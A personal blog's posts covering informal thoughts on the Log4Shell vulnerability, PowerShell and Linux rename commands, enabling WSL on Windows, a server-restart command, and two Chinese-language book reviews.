Saturday, December 18, 2021

Random thoughts on log4shell

Just as I was with my daily random YouTube video clips watching, I saw one of my subscribed content put up this. This is one of the content I found so far, easier for my to catch up with this vulnerability details.



If you prefer read than watch video, there's another online post about the related exploit at fastly is easy to read. Based on the diagram from this article, I think (maybe naively, and maybe it could be sufficient as a mitigation plan, I don't know), having the firewall rules to deny all with allow lists would be the best mitigation option while waiting for a patch. This stop the "query ldap" path at the first phase, thus it won't have a chance to go to the second phase from this vulnerability.



Anyway, this log4shell vulnerability has caught attention widely since last week. It has been a disasterous event for IT team. They need to find ways to check if the servers are impacted? Look for automated ways to detect if this log4j library exists in the machines. How serious is this? Is there a patch? While waiting for patch, what's next? How to mitigate the risk for the time being? Are mitigations in place? What other potential risks is there? And things got more worrying when the first patch of log4j by disabling the jndi feature doesn't not fix this mess completely!

I could imagine what's the team reaction when R&D team downloaded the log4j patch, applied the change to the repository, rebuild the application/system, went through QA testing and ready for release... Then, alas! Another log4j patch is released. As I just checked the log4j security page while writing this, a third patch is released.

And if you are in customer facing support team... You will need to know what the vulnerabiity is about, is it impacting the system that you are supporting, what is the recommendations. You need to do a lot of studies while waiting for R&D's reply. And you need to make sure your customer feel secure, happy and satisfied with your response. (I am trying to imaging what is the customer's expectation. :D)

Lastly, if you are interested to know more about jndi, visit the tutorial here. The log4j lookup function is actually quite handy. Based on today's update for log4j 2.17.0 (3rd patch that I mentioned earlier), you must enable the jndi lookup in order to use this function. Like the YouTuber said, it is not a log4j bug, or jndi problem, it's about how the function is being called/used. And of course, with good coding practice: always validate/sanitize user inputs can avoid this!

This is not a technical post, but just my record of thoughts that I have so far. I heard developers saying, "Why use log4j? We already drop log4j from our system, other dev team should have done the same." "We should use non-popular library so no one would target on our system." I was like... huh? Found someone that is more naive than me! Other dev out there, I just... wish you well.

Useful link(s)





Thursday, November 18, 2021

Rename files using power shell

I definitely miss Linux a lot. However, my main working environments are in Windows. It has been 5 years!

Just had a call with one of the customers. I need to rename 100+ files. Sigh. During the call, I had time pressure, and I couldn't tolerate with continuous of try and error. So, I used the slowest and safest but human-error-proned way of doing it, rename it manually, one by one.

We got silence moment in the call, then we suggested to communicate via email to sync up. Phew, pressure went away. So I did a quick Google search. I have tried to search for this solution for several times, but I never get it right, get it work. Probably I am still unconsciously resisting to PowerShell. Anyway, recently I seems to have more luck with PowerShell!

Then, in a few minutes, I finally found the "ultimate" solution!

Get-ChildItem *.txt | Rename-Item -NewName { $_.Name -replace 'a','b' }


And then, suddenly I found out, I forgot how to do this in Linux... Sigh.

* update

This is the equivalent Linux command:

rename 's/a/b/' *.txt


Tuesday, November 16, 2021

WSL - Window Subsystem for Linux

I am not sure how old is this feature available in Windows 10. Recently, I screened through Turn Window features on or off list again and found this. I got excited, and turn it on. I have to admit, this is the best solution for me as of now, which I cannot install Virtual Box on this laptop for whatever reason or policy. :P

I did a search on Google and found this page Install WSL by Microsoft. But it says... You must be running Windows 10 version 2004 and higher (Build 19041 and higher) or Windows 11. I checked my system, it is running at a lower version. :(

Well, do you think it would stop me from continue? Of course not! If you have it available in the list, of course it should be ready to use!

So I go ahead and enable it. Then, maybe I restarted laptop. In case you want to know how and where to enable it, follow these steps.

1. Open Control Panel
2. Click on "Programs"
3. Click on "Turn Window features on or off"
4. A dialog box pop up, scroll to the end. You'll see this.



5. Click to the checkbox besides Windows Subsystem for Linux
6. Then, maybe restart your system? (I can't recall if I did this or not)

Next, install.. I selected Ubuntu 20.04 LTS.

7. Launch Microsoft Store
8. Search for Linux
9. Click on the Linux distibution that you want to install.
10. Click on the Get button to download
11. Follow the instruction to install

Gaodim!

One thing that doesn't work with this WSL is on the network related command. Here I list the few commands I tried which do not work, even after I have installed the necessary package.

$ show ip route
$ nmap
$ hping3


For example the hping3 command, you'll get the open_sockraw permission error, even you run with sudo!



And best part is, you cannot reboot. :D Unless you restart your Windows. I forgot what triggered me to do the reboot...



You can run this from command prompt. Open a DOS command window, and type wsl. You will get the shell running on your DOS environment!

In case you forgot your password, try this in DOS command window.

wsl -u root

It works like magic!



That's all for my sharing today. If you observed the screenshot earlier, I enabled the Windows Sandbox as well. It is another nice, cool feature that I use for some naughty testing! I'll find time to share it next time.

Friday, August 20, 2021

Restart a Windows server command

This is to restart the server immediately command. Keeping a copy here for me to refer next time.

shutdown /r /t 0

Friday, July 30, 2021

【有一本書】一看就懂的上古史

看完了這本書,我有種“終於看完了”的感覺。畢竟是自己喜歡的課題,不過因爲有著太多的興趣,還有惰性,這本書在買了五年后才看完,有點過分。不過,至少此刻我可以在自己的checklist裏,劃掉其中一個項目了。開心-ing。

這是一本深入淺出的書。我喜歡作者把歷史、考古、傳説、神話混在一起,寫出他們之間的連接,或吧傳説、神話現實化,邏輯化,因此讓我覺得有種“原來如此”的瞭解。不過,如果真穿越到上古時代,不知道會是怎麽樣的情況。網路小説大都是穿越到架空時代或古代。如果把故事寫成穿越到上古時期,母系社會的時候,會不會可以制止奴隸制度呢?我想遠了。

這支影片是我看了這本書的分享。希望你喜歡。



Tuesday, June 29, 2021

[有一本書] 老子的部落格 | Lao Tze's blog

我還在想,要不要也在部落格上分享目前同名的YouTube頻道。不過,這支影片有介紹老子的修身、處事的三大法寶,想分享給更多的人。想想了,還是就寫寫吧。

這個系列,源自于想曬自己書房(儲存室)裏的東西演變而成的。不説其他了,直接進入主題。

老子的修身處事三大法寶:

1. 慈。
2. 儉。
3. 不敢為天下先。

詳情,請看影片。



更詳情,找書來看吧!^^